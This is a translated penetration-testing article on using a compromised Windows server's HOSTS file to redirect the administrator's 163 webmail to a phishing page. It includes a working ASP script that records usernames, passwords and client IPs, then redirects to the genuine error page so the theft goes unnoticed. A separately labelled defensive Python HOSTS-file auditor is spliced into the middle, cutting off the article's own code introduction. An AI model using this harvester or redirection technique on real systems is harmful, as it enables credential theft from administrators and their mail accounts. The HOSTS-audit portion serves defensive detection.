Leng fengge
+ ------------------------------- +
I. The Problem
During penetration testing, once we have obtained a webshell we may run into the following problems:
(1) We get the WebShell and easily take the server's system, only to find that this server has no value in itself. How can we expand on that foothold when the server is standalone, or when we cannot pivot to other hosts in the intranet?
(2) We often have this idea: if we obtain the website administrator's password, it is likely similar to the system password or other key passwords, so these can serve as the basis for social engineering. That too is a question of how to expand our results.
In the end it comes down to one problem: how to expand the results. My idea is to first check which web pages the administrator frequently visits when logged on to the server. If there is a mail site or some other website, so much the better: we can modify its DNS resolution so that the administrator first reaches a page we have prepared for phishing, or even one that directly serves a trojan. This is a common practice. Of course, if the administrator does not frequently visit any websites from this browser, we can instead add a phishing or trojan page in the management backend of the website we have compromised. What we discuss today, however, is DNS spoofing of the websites the administrator frequently visits.
II. Principles
Speaking of the principles of DNS resolution, a lot of background could be involved; I do not want to cover all of it in this article. We only care about the order of DNS resolution, and the following figure explains the problem (Figure 01):
In simple terms, this is the sequence diagram of the DNS name resolution process. Ordered by priority, the steps are as follows:
<1> enter the URL in IE or ping the domain name
<2> check whether the name is the local computer's own name
<3> query the records in the system HOSTS file, C:\windows\system32\drivers\etc\hosts
<4> query the local DNS server
<5> search the NetBIOS name cache
<6> look up the mapping between the domain name and IP address on the WINS server
<7> broadcast a request asking for the mapping between the domain name and IP address
<8> look up the local LMHOSTS file (in the same directory as the HOSTS file)
Among these eight steps, resolution is complete as soon as any one step succeeds. We have two places we could modify, step 1 and step 8, but in the general case resolution only ever gets as far as step 4, so we can modify the HOSTS file to implement DNS spoofing. That is the principle in brief.
III. Practice
I am worried that some readers would get themselves into trouble, so I will not demonstrate in a real environment. I set up DNS spoofing in a Windows 2003 system built on a local virtual machine to capture the administrator's 163 mailbox account information.
1. Set up DNS spoofing by modifying the HOSTS file
Open c:\windows\system32\drivers\etc\hosts (Figure 02):
192.168.11.11 is the server hosting your phishing page, and mail.163.com is the page the server administrator frequently visits, that is, the website we want to spoof. After modifying and saving the file, ping the name to check whether the mapping has taken effect; this also verifies whether the theory in the Principles section is correct. The result is shown in Figure 03:
We find that ping mail.163.com is now directed to the server hosting our phishing page. The key part that follows is the design of the phishing page; of course, the more realistic it is, the higher the success rate. I used ASP to imitate the 163 logon interface and changed the action of the form on that page to our local checklogin.asp. To make it more realistic and keep the administrator from becoming alert, we also need to construct an error page. Below is our main password-recording file:
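From the defender's side, the HOSTS modification described in the Principles and Practice sections is exactly the kind of change a host audit should catch. The following Python script is an added example, not code from the original article: it parses a HOSTS file and flags any entry that pins a real domain name to a routable (non-loopback, non-sinkhole) address. The sample HOSTS content is constructed inline; the values 192.168.11.11 and mail.163.com are taken from the article's scenario, and the file path logic at the bottom is an assumption for running it against a live system.

```python
"""Audit a HOSTS file for entries that redirect a domain name to a routable address.

Added example for illustration; not part of the original article.
"""
import ipaddress
import os
import sys

# Constructed sample HOSTS content. The first entries are ordinary defaults,
# the 192.168.11.11 line is the kind of entry the article describes.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-1999 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
192.168.11.11   mail.163.com   # mapping added by an intruder
127.0.0.1       www.example.test
"""

# Names that legitimately map to loopback on almost every system.
LOOPBACK_NAMES = {"localhost", "localhost.localdomain", "broadcasthost"}


def parse_hosts(text):
    """Return (ip, hostname, line_no) tuples, skipping blank and comment lines.

    Malformed lines (first token is not an IP address) are skipped here;
    a production auditor should log them instead.
    """
    entries = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()   # drop trailing comments
        if not line:
            continue
        parts = line.split()
        try:
            ip = ipaddress.ip_address(parts[0])
        except ValueError:
            continue
        for name in parts[1:]:
            entries.append((str(ip), name.lower(), line_no))
    return entries


def suspicious_entries(text):
    """Flag HOSTS entries that pin a dotted hostname to a routable address.

    Each finding is (line_no, ip, hostname, reason). Loopback and
    unspecified (0.0.0.0) targets are ignored because ad blockers and
    sinkhole lists use them legitimately.
    """
    findings = []
    for ip_str, name, line_no in parse_hosts(text):
        ip = ipaddress.ip_address(ip_str)
        if name in LOOPBACK_NAMES or ip.is_loopback or ip.is_unspecified:
            continue
        if "." not in name:
            continue   # bare single-label names are usually local conveniences
        kind = "private" if ip.is_private else "public"
        findings.append((line_no, ip_str, name,
                         f"{name} pinned to {kind} address {ip_str}"))
    return findings


def default_hosts_path():
    """Assumed default HOSTS path for the current platform."""
    if os.name == "nt":
        root = os.environ.get("SystemRoot", r"C:\Windows")
        return os.path.join(root, "System32", "drivers", "etc", "hosts")
    return "/etc/hosts"


if __name__ == "__main__":
    # With no argument, audit the constructed sample; with a path, audit that file.
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            content = fh.read()
    else:
        content = SAMPLE_HOSTS
    for line_no, ip_str, name, reason in suspicious_entries(content):
        print(f"line {line_no}: {reason}")
```

Run it with no arguments to see the constructed sample flagged, or pass the path from `default_hosts_path()` to audit a real machine. Any finding for a mail or banking domain that the organisation does not deliberately override deserves a look at who last modified the file and when.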
+ ------------------------------- +
<%
' Get the user account from the submitted form
mailuser = Request.Form("username")
' Get the user password
mailpwd = Request.Form("password")
' Combine the collected information into one record
mailinfo = mailinfo & "ClientIP:" & Request.ServerVariables("REMOTE_HOST") & "|"
mailinfo = mailinfo & "MailUser:" & mailuser & "@163.com|MailPwd:" & mailpwd
' Get the physical path of mail.txt; the file is created below if it does not exist
pwdtxt = Server.MapPath("mail.txt")
' Use the FSO component to write the text file
Set fso = Server.CreateObject("Scripting.FileSystemObject")
' OpenTextFile: the second parameter 8 means append mode, the third creates the file if missing
Set txtfile = fso.OpenTextFile(pwdtxt, 8, True)
txtfile.WriteLine(mailinfo)
txtfile.Close
' After recording the password, send the user to the real 163 "wrong password" page
rurl = "http://email.163.com/errorpage/err_163.htm?ErrorType=460&errorUsername=" & mailuser & "@163.com"
' Redirect immediately to the 163 page
Response.Redirect(rurl)
%>
+ ------------------------------- +
It is particularly important to note that the domain name email.163.com used in rurl for the error page must not be the same as the name in the HOSTS file above. Otherwise it would resolve to our own server, the file would not exist there, and an error would be reported. This mainly relies on the site having an alias domain; once you have found the alias, you can intercept the password completely. The concealment is better this way, because getting the password wrong once or twice is normal and does not easily put the administrator on alert.
When the administrator visits mail.163.com on the server, he reaches the IP address we configured in advance. After he enters the password, we redirect him to the 163 "password error" page, after which he can log on to the 163 mailbox normally, so the trick is not easily noticed. Some may ask: what if there is no alias? Then it is indeed not so easy, but you can still send him to www.163.com; it is just less concealed.
That is the whole of the practical procedure.
IV. Summary
Experience is often accumulated during the penetration process, and this idea may be worth considering when all other options have run out. It has many advantages: the whole process is easy to implement, and you only need to modify the script or build a phishing page yourself. Another application is to use it to obtain the administrator's password, which is a good option when we cannot crack it. Finally, many network security enthusiasts like me are not familiar with AV evasion, and this approach spares them the trouble of having trojans or privilege-escalation tools detected and removed. This article is just one way of thinking; many of you will have your own ideas, and I hope you will point out anything I have missed.